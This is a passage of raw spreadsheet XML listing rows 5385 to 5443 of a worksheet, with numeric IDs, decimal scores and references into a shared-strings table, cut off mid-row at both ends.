        <v>10648</v>
      </c>
      <c r="H5385" t="s">
        <v>10649</v>
      </c>
    </row>
    <row r="5386" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5386" s="1">
        <v>5384</v>
      </c>
      <c r="B5386">
        <v>7364</v>
      </c>
      <c r="C5386">
        <v>7364</v>
      </c>
      <c r="D5386">
        <v>3</v>
      </c>
      <c r="E5386">
        <v>0.44670000672340388</v>
      </c>
      <c r="F5386" t="s">
        <v>10120</v>
      </c>
      <c r="G5386" t="s">
        <v>10650</v>
      </c>
      <c r="H5386" t="s">
        <v>10651</v>
      </c>
    </row>
    <row r="5387" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5387" s="1">
        <v>5385</v>
      </c>
      <c r="B5387">
        <v>7363</v>
      </c>
      <c r="C5387">
        <v>7363</v>
      </c>
      <c r="D5387">
        <v>3</v>
      </c>
      <c r="E5387">
        <v>0.88520002365112305</v>
      </c>
      <c r="F5387" t="s">
        <v>10120</v>
      </c>
      <c r="G5387" t="s">
        <v>10652</v>
      </c>
      <c r="H5387" t="s">
        <v>10653</v>
      </c>
    </row>
    <row r="5388" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5388" s="1">
        <v>5386</v>
      </c>
      <c r="B5388">
        <v>7357</v>
      </c>
      <c r="C5388">
        <v>7357</v>
      </c>
      <c r="D5388">
        <v>3</v>
      </c>
      <c r="E5388">
        <v>0.48339998722076422</v>
      </c>
      <c r="F5388" t="s">
        <v>10120</v>
      </c>
      <c r="G5388" t="s">
        <v>10654</v>
      </c>
      <c r="H5388" t="s">
        <v>10655</v>
      </c>
    </row>
    <row r="5389" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5389" s="1">
        <v>5387</v>
      </c>
      <c r="B5389">
        <v>6162</v>
      </c>
      <c r="C5389">
        <v>6162</v>
      </c>
      <c r="D5389">
        <v>3</v>
      </c>
      <c r="E5389">
        <v>0.45039999485015869</v>
      </c>
      <c r="F5389" t="s">
        <v>10120</v>
      </c>
      <c r="G5389" t="s">
        <v>10656</v>
      </c>
      <c r="H5389" t="s">
        <v>10657</v>
      </c>
    </row>
    <row r="5390" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5390" s="1">
        <v>5388</v>
      </c>
      <c r="B5390">
        <v>6760</v>
      </c>
      <c r="C5390">
        <v>6760</v>
      </c>
      <c r="D5390">
        <v>3</v>
      </c>
      <c r="E5390">
        <v>0.55620002746582031</v>
      </c>
      <c r="F5390" t="s">
        <v>10120</v>
      </c>
      <c r="G5390" t="s">
        <v>10658</v>
      </c>
      <c r="H5390" t="s">
        <v>10659</v>
      </c>
    </row>
    <row r="5391" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5391" s="1">
        <v>5389</v>
      </c>
      <c r="B5391">
        <v>7356</v>
      </c>
      <c r="C5391">
        <v>7356</v>
      </c>
      <c r="D5391">
        <v>3</v>
      </c>
      <c r="E5391">
        <v>0.6470000147819519</v>
      </c>
      <c r="F5391" t="s">
        <v>10120</v>
      </c>
      <c r="G5391" t="s">
        <v>10660</v>
      </c>
      <c r="H5391" t="s">
        <v>10661</v>
      </c>
    </row>
    <row r="5392" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5392" s="1">
        <v>5390</v>
      </c>
      <c r="B5392">
        <v>5843</v>
      </c>
      <c r="C5392">
        <v>5843</v>
      </c>
      <c r="D5392">
        <v>3</v>
      </c>
      <c r="E5392">
        <v>0.78949999809265137</v>
      </c>
      <c r="F5392" t="s">
        <v>10120</v>
      </c>
      <c r="G5392" t="s">
        <v>10662</v>
      </c>
      <c r="H5392" t="s">
        <v>10663</v>
      </c>
    </row>
    <row r="5393" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5393" s="1">
        <v>5391</v>
      </c>
      <c r="B5393">
        <v>5844</v>
      </c>
      <c r="C5393">
        <v>5844</v>
      </c>
      <c r="D5393">
        <v>3</v>
      </c>
      <c r="E5393">
        <v>0.99739998579025269</v>
      </c>
      <c r="F5393" t="s">
        <v>10120</v>
      </c>
      <c r="G5393" t="s">
        <v>10664</v>
      </c>
      <c r="H5393" t="s">
        <v>10665</v>
      </c>
    </row>
    <row r="5394" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5394" s="1">
        <v>5392</v>
      </c>
      <c r="B5394">
        <v>6171</v>
      </c>
      <c r="C5394">
        <v>6171</v>
      </c>
      <c r="D5394">
        <v>3</v>
      </c>
      <c r="E5394">
        <v>0.95649999380111694</v>
      </c>
      <c r="F5394" t="s">
        <v>10120</v>
      </c>
      <c r="G5394" t="s">
        <v>10666</v>
      </c>
      <c r="H5394" t="s">
        <v>10667</v>
      </c>
    </row>
    <row r="5395" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5395" s="1">
        <v>5393</v>
      </c>
      <c r="B5395">
        <v>6758</v>
      </c>
      <c r="C5395">
        <v>6758</v>
      </c>
      <c r="D5395">
        <v>3</v>
      </c>
      <c r="E5395">
        <v>0.91979998350143433</v>
      </c>
      <c r="F5395" t="s">
        <v>10120</v>
      </c>
      <c r="G5395" t="s">
        <v>10668</v>
      </c>
      <c r="H5395" t="s">
        <v>10669</v>
      </c>
    </row>
    <row r="5396" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5396" s="1">
        <v>5394</v>
      </c>
      <c r="B5396">
        <v>7353</v>
      </c>
      <c r="C5396">
        <v>7353</v>
      </c>
      <c r="D5396">
        <v>3</v>
      </c>
      <c r="E5396">
        <v>0.51319998502731323</v>
      </c>
      <c r="F5396" t="s">
        <v>10120</v>
      </c>
      <c r="G5396" t="s">
        <v>10670</v>
      </c>
      <c r="H5396" t="s">
        <v>10671</v>
      </c>
    </row>
    <row r="5397" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5397" s="1">
        <v>5395</v>
      </c>
      <c r="B5397">
        <v>6752</v>
      </c>
      <c r="C5397">
        <v>6752</v>
      </c>
      <c r="D5397">
        <v>3</v>
      </c>
      <c r="E5397">
        <v>0.98280000686645508</v>
      </c>
      <c r="F5397" t="s">
        <v>10120</v>
      </c>
      <c r="G5397" t="s">
        <v>10672</v>
      </c>
      <c r="H5397" t="s">
        <v>10673</v>
      </c>
    </row>
    <row r="5398" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5398" s="1">
        <v>5396</v>
      </c>
      <c r="B5398">
        <v>7352</v>
      </c>
      <c r="C5398">
        <v>7352</v>
      </c>
      <c r="D5398">
        <v>3</v>
      </c>
      <c r="E5398">
        <v>0.78560000658035278</v>
      </c>
      <c r="F5398" t="s">
        <v>10120</v>
      </c>
      <c r="G5398" t="s">
        <v>10674</v>
      </c>
      <c r="H5398" t="s">
        <v>10675</v>
      </c>
    </row>
    <row r="5399" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5399" s="1">
        <v>5397</v>
      </c>
      <c r="B5399">
        <v>5850</v>
      </c>
      <c r="C5399">
        <v>5850</v>
      </c>
      <c r="D5399">
        <v>3</v>
      </c>
      <c r="E5399">
        <v>0.49050000309944147</v>
      </c>
      <c r="F5399" t="s">
        <v>10120</v>
      </c>
      <c r="G5399" t="s">
        <v>10676</v>
      </c>
      <c r="H5399" t="s">
        <v>10677</v>
      </c>
    </row>
    <row r="5400" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5400" s="1">
        <v>5398</v>
      </c>
      <c r="B5400">
        <v>5852</v>
      </c>
      <c r="C5400">
        <v>5852</v>
      </c>
      <c r="D5400">
        <v>3</v>
      </c>
      <c r="E5400">
        <v>0.54689997434616089</v>
      </c>
      <c r="F5400" t="s">
        <v>10120</v>
      </c>
      <c r="G5400" t="s">
        <v>10678</v>
      </c>
      <c r="H5400" t="s">
        <v>10679</v>
      </c>
    </row>
    <row r="5401" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5401" s="1">
        <v>5399</v>
      </c>
      <c r="B5401">
        <v>7341</v>
      </c>
      <c r="C5401">
        <v>7341</v>
      </c>
      <c r="D5401">
        <v>3</v>
      </c>
      <c r="E5401">
        <v>0.60970002412796021</v>
      </c>
      <c r="F5401" t="s">
        <v>10120</v>
      </c>
      <c r="G5401" t="s">
        <v>10680</v>
      </c>
      <c r="H5401" t="s">
        <v>10681</v>
      </c>
    </row>
    <row r="5402" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5402" s="1">
        <v>5400</v>
      </c>
      <c r="B5402">
        <v>7348</v>
      </c>
      <c r="C5402">
        <v>7348</v>
      </c>
      <c r="D5402">
        <v>3</v>
      </c>
      <c r="E5402">
        <v>0.99570000171661377</v>
      </c>
      <c r="F5402" t="s">
        <v>10120</v>
      </c>
      <c r="G5402" t="s">
        <v>10682</v>
      </c>
      <c r="H5402" t="s">
        <v>10683</v>
      </c>
    </row>
    <row r="5403" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5403" s="1">
        <v>5401</v>
      </c>
      <c r="B5403">
        <v>5860</v>
      </c>
      <c r="C5403">
        <v>5860</v>
      </c>
      <c r="D5403">
        <v>3</v>
      </c>
      <c r="E5403">
        <v>0.66019999980926514</v>
      </c>
      <c r="F5403" t="s">
        <v>10120</v>
      </c>
      <c r="G5403" t="s">
        <v>10684</v>
      </c>
      <c r="H5403" t="s">
        <v>10685</v>
      </c>
    </row>
    <row r="5404" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5404" s="1">
        <v>5402</v>
      </c>
      <c r="B5404">
        <v>6749</v>
      </c>
      <c r="C5404">
        <v>6749</v>
      </c>
      <c r="D5404">
        <v>3</v>
      </c>
      <c r="E5404">
        <v>0.8148999810218811</v>
      </c>
      <c r="F5404" t="s">
        <v>10120</v>
      </c>
      <c r="G5404" t="s">
        <v>10686</v>
      </c>
      <c r="H5404" t="s">
        <v>10687</v>
      </c>
    </row>
    <row r="5405" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5405" s="1">
        <v>5403</v>
      </c>
      <c r="B5405">
        <v>5859</v>
      </c>
      <c r="C5405">
        <v>5859</v>
      </c>
      <c r="D5405">
        <v>3</v>
      </c>
      <c r="E5405">
        <v>0.93680000305175781</v>
      </c>
      <c r="F5405" t="s">
        <v>10120</v>
      </c>
      <c r="G5405" t="s">
        <v>10688</v>
      </c>
      <c r="H5405" t="s">
        <v>10689</v>
      </c>
    </row>
    <row r="5406" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5406" s="1">
        <v>5404</v>
      </c>
      <c r="B5406">
        <v>7355</v>
      </c>
      <c r="C5406">
        <v>7355</v>
      </c>
      <c r="D5406">
        <v>3</v>
      </c>
      <c r="E5406">
        <v>0.5220000147819519</v>
      </c>
      <c r="F5406" t="s">
        <v>10120</v>
      </c>
      <c r="G5406" t="s">
        <v>10690</v>
      </c>
      <c r="H5406" t="s">
        <v>10691</v>
      </c>
    </row>
    <row r="5407" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5407" s="1">
        <v>5405</v>
      </c>
      <c r="B5407">
        <v>6154</v>
      </c>
      <c r="C5407">
        <v>6154</v>
      </c>
      <c r="D5407">
        <v>3</v>
      </c>
      <c r="E5407">
        <v>0.83259999752044678</v>
      </c>
      <c r="F5407" t="s">
        <v>10120</v>
      </c>
      <c r="G5407" t="s">
        <v>10692</v>
      </c>
      <c r="H5407" t="s">
        <v>10693</v>
      </c>
    </row>
    <row r="5408" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5408" s="1">
        <v>5406</v>
      </c>
      <c r="B5408">
        <v>6174</v>
      </c>
      <c r="C5408">
        <v>6174</v>
      </c>
      <c r="D5408">
        <v>3</v>
      </c>
      <c r="E5408">
        <v>0.99489998817443848</v>
      </c>
      <c r="F5408" t="s">
        <v>10120</v>
      </c>
      <c r="G5408" t="s">
        <v>10694</v>
      </c>
      <c r="H5408" t="s">
        <v>10695</v>
      </c>
    </row>
    <row r="5409" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5409" s="1">
        <v>5407</v>
      </c>
      <c r="B5409">
        <v>6176</v>
      </c>
      <c r="C5409">
        <v>6176</v>
      </c>
      <c r="D5409">
        <v>3</v>
      </c>
      <c r="E5409">
        <v>0.82779997587203979</v>
      </c>
      <c r="F5409" t="s">
        <v>10120</v>
      </c>
      <c r="G5409" t="s">
        <v>10696</v>
      </c>
      <c r="H5409" t="s">
        <v>10697</v>
      </c>
    </row>
    <row r="5410" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5410" s="1">
        <v>5408</v>
      </c>
      <c r="B5410">
        <v>6771</v>
      </c>
      <c r="C5410">
        <v>6771</v>
      </c>
      <c r="D5410">
        <v>3</v>
      </c>
      <c r="E5410">
        <v>0.99409997463226318</v>
      </c>
      <c r="F5410" t="s">
        <v>10120</v>
      </c>
      <c r="G5410" t="s">
        <v>10698</v>
      </c>
      <c r="H5410" t="s">
        <v>10699</v>
      </c>
    </row>
    <row r="5411" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5411" s="1">
        <v>5409</v>
      </c>
      <c r="B5411">
        <v>6727</v>
      </c>
      <c r="C5411">
        <v>6727</v>
      </c>
      <c r="D5411">
        <v>3</v>
      </c>
      <c r="E5411">
        <v>0.50099998712539673</v>
      </c>
      <c r="F5411" t="s">
        <v>10120</v>
      </c>
      <c r="G5411" t="s">
        <v>10700</v>
      </c>
      <c r="H5411" t="s">
        <v>10701</v>
      </c>
    </row>
    <row r="5412" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5412" s="1">
        <v>5410</v>
      </c>
      <c r="B5412">
        <v>6767</v>
      </c>
      <c r="C5412">
        <v>6767</v>
      </c>
      <c r="D5412">
        <v>3</v>
      </c>
      <c r="E5412">
        <v>0.83259999752044678</v>
      </c>
      <c r="F5412" t="s">
        <v>10120</v>
      </c>
      <c r="G5412" t="s">
        <v>10702</v>
      </c>
      <c r="H5412" t="s">
        <v>10703</v>
      </c>
    </row>
    <row r="5413" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5413" s="1">
        <v>5411</v>
      </c>
      <c r="B5413">
        <v>7315</v>
      </c>
      <c r="C5413">
        <v>7315</v>
      </c>
      <c r="D5413">
        <v>3</v>
      </c>
      <c r="E5413">
        <v>0.45440000295639038</v>
      </c>
      <c r="F5413" t="s">
        <v>10120</v>
      </c>
      <c r="G5413" t="s">
        <v>10704</v>
      </c>
      <c r="H5413" t="s">
        <v>10705</v>
      </c>
    </row>
    <row r="5414" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5414" s="1">
        <v>5412</v>
      </c>
      <c r="B5414">
        <v>7400</v>
      </c>
      <c r="C5414">
        <v>7400</v>
      </c>
      <c r="D5414">
        <v>3</v>
      </c>
      <c r="E5414">
        <v>0.6031000018119812</v>
      </c>
      <c r="F5414" t="s">
        <v>10120</v>
      </c>
      <c r="G5414" t="s">
        <v>10706</v>
      </c>
      <c r="H5414" t="s">
        <v>10707</v>
      </c>
    </row>
    <row r="5415" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5415" s="1">
        <v>5413</v>
      </c>
      <c r="B5415">
        <v>6766</v>
      </c>
      <c r="C5415">
        <v>6766</v>
      </c>
      <c r="D5415">
        <v>3</v>
      </c>
      <c r="E5415">
        <v>0.76660001277923584</v>
      </c>
      <c r="F5415" t="s">
        <v>10120</v>
      </c>
      <c r="G5415" t="s">
        <v>10708</v>
      </c>
      <c r="H5415" t="s">
        <v>10709</v>
      </c>
    </row>
    <row r="5416" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5416" s="1">
        <v>5414</v>
      </c>
      <c r="B5416">
        <v>6731</v>
      </c>
      <c r="C5416">
        <v>6731</v>
      </c>
      <c r="D5416">
        <v>3</v>
      </c>
      <c r="E5416">
        <v>0.96979999542236328</v>
      </c>
      <c r="F5416" t="s">
        <v>10120</v>
      </c>
      <c r="G5416" t="s">
        <v>10710</v>
      </c>
      <c r="H5416" t="s">
        <v>10711</v>
      </c>
    </row>
    <row r="5417" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5417" s="1">
        <v>5415</v>
      </c>
      <c r="B5417">
        <v>5821</v>
      </c>
      <c r="C5417">
        <v>5821</v>
      </c>
      <c r="D5417">
        <v>3</v>
      </c>
      <c r="E5417">
        <v>0.68059998750686646</v>
      </c>
      <c r="F5417" t="s">
        <v>10120</v>
      </c>
      <c r="G5417" t="s">
        <v>10712</v>
      </c>
      <c r="H5417" t="s">
        <v>10713</v>
      </c>
    </row>
    <row r="5418" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5418" s="1">
        <v>5416</v>
      </c>
      <c r="B5418">
        <v>6732</v>
      </c>
      <c r="C5418">
        <v>6732</v>
      </c>
      <c r="D5418">
        <v>3</v>
      </c>
      <c r="E5418">
        <v>0.57090002298355103</v>
      </c>
      <c r="F5418" t="s">
        <v>10120</v>
      </c>
      <c r="G5418" t="s">
        <v>10714</v>
      </c>
      <c r="H5418" t="s">
        <v>10715</v>
      </c>
    </row>
    <row r="5419" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5419" s="1">
        <v>5417</v>
      </c>
      <c r="B5419">
        <v>7318</v>
      </c>
      <c r="C5419">
        <v>7318</v>
      </c>
      <c r="D5419">
        <v>3</v>
      </c>
      <c r="E5419">
        <v>0.55210000276565552</v>
      </c>
      <c r="F5419" t="s">
        <v>10120</v>
      </c>
      <c r="G5419" t="s">
        <v>10716</v>
      </c>
      <c r="H5419" t="s">
        <v>10717</v>
      </c>
    </row>
    <row r="5420" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5420" s="1">
        <v>5418</v>
      </c>
      <c r="B5420">
        <v>6184</v>
      </c>
      <c r="C5420">
        <v>6184</v>
      </c>
      <c r="D5420">
        <v>3</v>
      </c>
      <c r="E5420">
        <v>0.84289997816085815</v>
      </c>
      <c r="F5420" t="s">
        <v>10120</v>
      </c>
      <c r="G5420" t="s">
        <v>10718</v>
      </c>
      <c r="H5420" t="s">
        <v>10719</v>
      </c>
    </row>
    <row r="5421" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5421" s="1">
        <v>5419</v>
      </c>
      <c r="B5421">
        <v>7320</v>
      </c>
      <c r="C5421">
        <v>7320</v>
      </c>
      <c r="D5421">
        <v>3</v>
      </c>
      <c r="E5421">
        <v>0.6478000283241272</v>
      </c>
      <c r="F5421" t="s">
        <v>10120</v>
      </c>
      <c r="G5421" t="s">
        <v>10720</v>
      </c>
      <c r="H5421" t="s">
        <v>10721</v>
      </c>
    </row>
    <row r="5422" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5422" s="1">
        <v>5420</v>
      </c>
      <c r="B5422">
        <v>6183</v>
      </c>
      <c r="C5422">
        <v>6183</v>
      </c>
      <c r="D5422">
        <v>3</v>
      </c>
      <c r="E5422">
        <v>0.63730001449584961</v>
      </c>
      <c r="F5422" t="s">
        <v>10120</v>
      </c>
      <c r="G5422" t="s">
        <v>10722</v>
      </c>
      <c r="H5422" t="s">
        <v>10723</v>
      </c>
    </row>
    <row r="5423" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5423" s="1">
        <v>5421</v>
      </c>
      <c r="B5423">
        <v>7321</v>
      </c>
      <c r="C5423">
        <v>7321</v>
      </c>
      <c r="D5423">
        <v>3</v>
      </c>
      <c r="E5423">
        <v>0.72640001773834229</v>
      </c>
      <c r="F5423" t="s">
        <v>10120</v>
      </c>
      <c r="G5423" t="s">
        <v>10724</v>
      </c>
      <c r="H5423" t="s">
        <v>10725</v>
      </c>
    </row>
    <row r="5424" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5424" s="1">
        <v>5422</v>
      </c>
      <c r="B5424">
        <v>6175</v>
      </c>
      <c r="C5424">
        <v>6175</v>
      </c>
      <c r="D5424">
        <v>3</v>
      </c>
      <c r="E5424">
        <v>0.94900000095367432</v>
      </c>
      <c r="F5424" t="s">
        <v>10120</v>
      </c>
      <c r="G5424" t="s">
        <v>10726</v>
      </c>
      <c r="H5424" t="s">
        <v>10727</v>
      </c>
    </row>
    <row r="5425" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5425" s="1">
        <v>5423</v>
      </c>
      <c r="B5425">
        <v>6181</v>
      </c>
      <c r="C5425">
        <v>6181</v>
      </c>
      <c r="D5425">
        <v>3</v>
      </c>
      <c r="E5425">
        <v>0.63330000638961792</v>
      </c>
      <c r="F5425" t="s">
        <v>10120</v>
      </c>
      <c r="G5425" t="s">
        <v>10728</v>
      </c>
      <c r="H5425" t="s">
        <v>10729</v>
      </c>
    </row>
    <row r="5426" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5426" s="1">
        <v>5424</v>
      </c>
      <c r="B5426">
        <v>7322</v>
      </c>
      <c r="C5426">
        <v>7322</v>
      </c>
      <c r="D5426">
        <v>3</v>
      </c>
      <c r="E5426">
        <v>0.37369999289512629</v>
      </c>
      <c r="F5426" t="s">
        <v>10120</v>
      </c>
      <c r="G5426" t="s">
        <v>10730</v>
      </c>
      <c r="H5426" t="s">
        <v>10731</v>
      </c>
    </row>
    <row r="5427" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5427" s="1">
        <v>5425</v>
      </c>
      <c r="B5427">
        <v>7324</v>
      </c>
      <c r="C5427">
        <v>7324</v>
      </c>
      <c r="D5427">
        <v>3</v>
      </c>
      <c r="E5427">
        <v>0.81440001726150513</v>
      </c>
      <c r="F5427" t="s">
        <v>10120</v>
      </c>
      <c r="G5427" t="s">
        <v>10732</v>
      </c>
      <c r="H5427" t="s">
        <v>10733</v>
      </c>
    </row>
    <row r="5428" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5428" s="1">
        <v>5426</v>
      </c>
      <c r="B5428">
        <v>6179</v>
      </c>
      <c r="C5428">
        <v>6179</v>
      </c>
      <c r="D5428">
        <v>3</v>
      </c>
      <c r="E5428">
        <v>0.66939997673034668</v>
      </c>
      <c r="F5428" t="s">
        <v>10120</v>
      </c>
      <c r="G5428" t="s">
        <v>10734</v>
      </c>
      <c r="H5428" t="s">
        <v>10735</v>
      </c>
    </row>
    <row r="5429" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5429" s="1">
        <v>5427</v>
      </c>
      <c r="B5429">
        <v>7390</v>
      </c>
      <c r="C5429">
        <v>7390</v>
      </c>
      <c r="D5429">
        <v>3</v>
      </c>
      <c r="E5429">
        <v>0.77069997787475586</v>
      </c>
      <c r="F5429" t="s">
        <v>10120</v>
      </c>
      <c r="G5429" t="s">
        <v>10736</v>
      </c>
      <c r="H5429" t="s">
        <v>10737</v>
      </c>
    </row>
    <row r="5430" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5430" s="1">
        <v>5428</v>
      </c>
      <c r="B5430">
        <v>7325</v>
      </c>
      <c r="C5430">
        <v>7325</v>
      </c>
      <c r="D5430">
        <v>3</v>
      </c>
      <c r="E5430">
        <v>0.95260000228881836</v>
      </c>
      <c r="F5430" t="s">
        <v>10120</v>
      </c>
      <c r="G5430" t="s">
        <v>10738</v>
      </c>
      <c r="H5430" t="s">
        <v>10739</v>
      </c>
    </row>
    <row r="5431" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5431" s="1">
        <v>5429</v>
      </c>
      <c r="B5431">
        <v>5827</v>
      </c>
      <c r="C5431">
        <v>5827</v>
      </c>
      <c r="D5431">
        <v>3</v>
      </c>
      <c r="E5431">
        <v>0.67580002546310425</v>
      </c>
      <c r="F5431" t="s">
        <v>10120</v>
      </c>
      <c r="G5431" t="s">
        <v>10740</v>
      </c>
      <c r="H5431" t="s">
        <v>10741</v>
      </c>
    </row>
    <row r="5432" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5432" s="1">
        <v>5430</v>
      </c>
      <c r="B5432">
        <v>7326</v>
      </c>
      <c r="C5432">
        <v>7326</v>
      </c>
      <c r="D5432">
        <v>3</v>
      </c>
      <c r="E5432">
        <v>0.98280000686645508</v>
      </c>
      <c r="F5432" t="s">
        <v>10120</v>
      </c>
      <c r="G5432" t="s">
        <v>10742</v>
      </c>
      <c r="H5432" t="s">
        <v>10743</v>
      </c>
    </row>
    <row r="5433" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5433" s="1">
        <v>5431</v>
      </c>
      <c r="B5433">
        <v>5829</v>
      </c>
      <c r="C5433">
        <v>5829</v>
      </c>
      <c r="D5433">
        <v>3</v>
      </c>
      <c r="E5433">
        <v>0.41449999809265142</v>
      </c>
      <c r="F5433" t="s">
        <v>10120</v>
      </c>
      <c r="G5433" t="s">
        <v>10744</v>
      </c>
      <c r="H5433" t="s">
        <v>10745</v>
      </c>
    </row>
    <row r="5434" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5434" s="1">
        <v>5432</v>
      </c>
      <c r="B5434">
        <v>7384</v>
      </c>
      <c r="C5434">
        <v>7384</v>
      </c>
      <c r="D5434">
        <v>3</v>
      </c>
      <c r="E5434">
        <v>0.93529999256134033</v>
      </c>
      <c r="F5434" t="s">
        <v>10120</v>
      </c>
      <c r="G5434" t="s">
        <v>10746</v>
      </c>
      <c r="H5434" t="s">
        <v>10747</v>
      </c>
    </row>
    <row r="5435" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5435" s="1">
        <v>5433</v>
      </c>
      <c r="B5435">
        <v>7383</v>
      </c>
      <c r="C5435">
        <v>7383</v>
      </c>
      <c r="D5435">
        <v>3</v>
      </c>
      <c r="E5435">
        <v>0.70959997177124023</v>
      </c>
      <c r="F5435" t="s">
        <v>10120</v>
      </c>
      <c r="G5435" t="s">
        <v>10748</v>
      </c>
      <c r="H5435" t="s">
        <v>10749</v>
      </c>
    </row>
    <row r="5436" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5436" s="1">
        <v>5434</v>
      </c>
      <c r="B5436">
        <v>6762</v>
      </c>
      <c r="C5436">
        <v>6762</v>
      </c>
      <c r="D5436">
        <v>3</v>
      </c>
      <c r="E5436">
        <v>0.46770000457763672</v>
      </c>
      <c r="F5436" t="s">
        <v>10120</v>
      </c>
      <c r="G5436" t="s">
        <v>10750</v>
      </c>
      <c r="H5436" t="s">
        <v>10751</v>
      </c>
    </row>
    <row r="5437" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5437" s="1">
        <v>5435</v>
      </c>
      <c r="B5437">
        <v>5832</v>
      </c>
      <c r="C5437">
        <v>5832</v>
      </c>
      <c r="D5437">
        <v>3</v>
      </c>
      <c r="E5437">
        <v>0.65439999103546143</v>
      </c>
      <c r="F5437" t="s">
        <v>10120</v>
      </c>
      <c r="G5437" t="s">
        <v>10752</v>
      </c>
      <c r="H5437" t="s">
        <v>10753</v>
      </c>
    </row>
    <row r="5438" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5438" s="1">
        <v>5436</v>
      </c>
      <c r="B5438">
        <v>6178</v>
      </c>
      <c r="C5438">
        <v>6178</v>
      </c>
      <c r="D5438">
        <v>3</v>
      </c>
      <c r="E5438">
        <v>0.82950001955032349</v>
      </c>
      <c r="F5438" t="s">
        <v>10120</v>
      </c>
      <c r="G5438" t="s">
        <v>10754</v>
      </c>
      <c r="H5438" t="s">
        <v>10755</v>
      </c>
    </row>
    <row r="5439" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5439" s="1">
        <v>5437</v>
      </c>
      <c r="B5439">
        <v>6177</v>
      </c>
      <c r="C5439">
        <v>6177</v>
      </c>
      <c r="D5439">
        <v>3</v>
      </c>
      <c r="E5439">
        <v>0.95730000734329224</v>
      </c>
      <c r="F5439" t="s">
        <v>10120</v>
      </c>
      <c r="G5439" t="s">
        <v>10756</v>
      </c>
      <c r="H5439" t="s">
        <v>10757</v>
      </c>
    </row>
    <row r="5440" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5440" s="1">
        <v>5438</v>
      </c>
      <c r="B5440">
        <v>5824</v>
      </c>
      <c r="C5440">
        <v>5824</v>
      </c>
      <c r="D5440">
        <v>3</v>
      </c>
      <c r="E5440">
        <v>0.51899999380111694</v>
      </c>
      <c r="F5440" t="s">
        <v>10120</v>
      </c>
      <c r="G5440" t="s">
        <v>10758</v>
      </c>
      <c r="H5440" t="s">
        <v>10759</v>
      </c>
    </row>
    <row r="5441" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5441" s="1">
        <v>5439</v>
      </c>
      <c r="B5441">
        <v>6286</v>
      </c>
      <c r="C5441">
        <v>6286</v>
      </c>
      <c r="D5441">
        <v>3</v>
      </c>
      <c r="E5441">
        <v>0.61599999666213989</v>
      </c>
      <c r="F5441" t="s">
        <v>10120</v>
      </c>
      <c r="G5441" t="s">
        <v>10760</v>
      </c>
      <c r="H5441" t="s">
        <v>10761</v>
      </c>
    </row>
    <row r="5442" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5442" s="1">
        <v>5440</v>
      </c>
      <c r="B5442">
        <v>6664</v>
      </c>
      <c r="C5442">
        <v>6664</v>
      </c>
      <c r="D5442">
        <v>3</v>
      </c>
      <c r="E5442">
        <v>0.42930001020431519</v>
      </c>
      <c r="F5442" t="s">
        <v>10120</v>
      </c>
      <c r="G5442" t="s">
        <v>10762</v>
      </c>
      <c r="H5442" t="s">
        <v>10763</v>
      </c>
    </row>
    <row r="5443" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5443" s="1">
        <v>5441</v>
      </c>
      <c r="B5443">
        <v>7504</v>
      </c>
      <c r="C5443">
        <v>7504</v>
      </c>
      <c r="D5443">
        <v>3</v>
      </c>
      <c r="E5443">
        <v>0.93660002946853638</v>
      </c>
      <c r="F5443" t="s">
        <v>10120</v>
      </c>
      <c r="G5443" t="s">
        <v>10764</v>
      </c>
      <c r="H5443" t="s">
        <v>10689</v>
      </c>
    </row>
    <row r="5444" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A5444" s="1">
